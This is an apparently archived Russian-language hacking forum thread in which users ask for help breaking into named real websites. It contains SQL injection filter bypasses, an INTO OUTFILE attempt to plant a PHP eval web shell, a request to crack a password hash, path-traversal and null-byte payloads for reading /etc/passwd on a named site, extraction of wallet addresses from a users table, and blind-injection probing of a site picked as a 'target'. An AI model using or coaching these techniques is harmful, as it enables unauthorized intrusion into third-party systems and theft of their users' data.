Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    реакция на UNION вместе с SELECT. может пройти что-то одно из этого
    можно еще так:
    union%0Aselect или любым другим пробелом
     
    _________________________
  2. Jamsho0T

    Jamsho0T New Member

    Joined:
    14 Jul 2009
    Messages:
    45
    Likes Received:
    3
    Reputations:
    1
    Всем привет, нужна помощь:
    magic_quotes_gpc On On
    file priv Y
    если захексить кавычку, то она выводится на страницу, без ошибок(Into Outfile + двойной запрос не покатил)
    через двойной запрос отображается +and+1=0+union+select+'',777+from+mysql.user+into+outfile.., а между ковычек <?php eval($_GET['e']) ?> отображается к исходном коде, но в файл не записывается.
    Есть еще способы залить шелл?


    И если у кого есть большой словарь, расшифруйте:
    f9fce403c946f20f5b0634d7fffcbbcf
    з.ы полный путь естественно есть
    криво описал :(
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    чтобы указать путь до файла нужны реальные кавычки в нормальном виде
     
    _________________________
    1 person likes this.
  4. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю

    Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
    Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
    Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6

    подставляю %00 и получаю

    Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6

    можно что нибудь сделать или уже ничего не вытащить?
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    incorrect_path/../../etc/passwd%00
     
    _________________________
  6. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    это нужно подставить?

    когда подставляю получаю

    Warning: include(): Failed opening '../kinonetwork/incorrect_path/../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ты уже рядом. Надо больше ../

    Ищи, пробуй.
     
    _________________________
    1 person likes this.
  8. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    дошел до 20 и думаю, дальше ничего не будет. Значить, уже ничего не сделаешь?
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Разложи карты ТАРО, они подскажут тебе верное направление или внимательней перечитай мануалы, может повезет, поймешь более правильный вектор, каждый случай индивидуальный и требует индивидуального рассмотрение на примере...
     
    _________________________
  10. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Помогите, пожалуйста немогу найти инклуд

    kinopalace.lviv.ua/kinonetwork/?id=../
     
  11. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    через group_concat выводите
     
    _________________________
  13. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    спасибо
     
    #24013 madam, 21 Mar 2015
    Last edited: 21 Mar 2015
  14. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    На подставление нулл-байта и изменении количества ../ поиск не ограничивается. Проанализируйте, есть ли есть waf на сайте, какие настройки и версия php используется( возможно ли использовании include в конструкции if, нормализация, усечение пути, стрим врапперы etc).
    По Вашим постам заметно, что используете самое малое количество методов, не пытаетесь разобраться во многом.
    Манов на форуме достаточно! :)
     
  15. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    спасибо, буду разбираться, простите за наверно глупые вопросы
     
  16. opahopa

    opahopa New Member

    Joined:
    30 Nov 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Приветствую. так получилось, что ранее не занимался никогда уязвимостями, хотя опыта в вебе разного много. Так вот, нубский вопрос.

    Выбрал цель http://www.colorfoto.de . Сканером нашел уязвимость здесь
    Code:
    http://www.colorfoto.de/abo/sonderhefte/?hnr=online.aboshop.colorfoto.stageteaser-canonEOS7D
    Собственно, при подставлении
    Code:
    ' -- 
    в конец значния параметра hnr результат не меняется. значит не фильтруются эти символы, так? попробовал руками большинство методов из "SQL injection полный FAQ". Так же, результат вывода не меняется, значит команды принимаются, но отчет об ошибках отключен + при не верном результате все-равно возвращает исходную страницу, верно?
    Собтвенно вопрос, если это инъекция - как хоть как-то узнать о результатах выполнения команды?

    Сюда же - сайт как я понял на каком-то MVC фреймворке сделан. как определить каком именно ?
     
  17. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Если я правильно понял, то ты подставляешь разные векторы, а в ответ исходная страница?
     
    _________________________
  18. opahopa

    opahopa New Member

    Joined:
    30 Nov 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    да, верно
     
  19. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Поставь плагин wappalyzer на фф.
    basket.js framework.
     
  20. opahopa

    opahopa New Member

    Joined:
    30 Nov 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    basket.js Это видимо просто скрипт корзины совпадающий с таким на других сайтах. получается тогда на безе CMS OXID e-shop согласно скрипту, но вероятность верного определения насколько велика?
     
Thread Status:
Not open for further replies.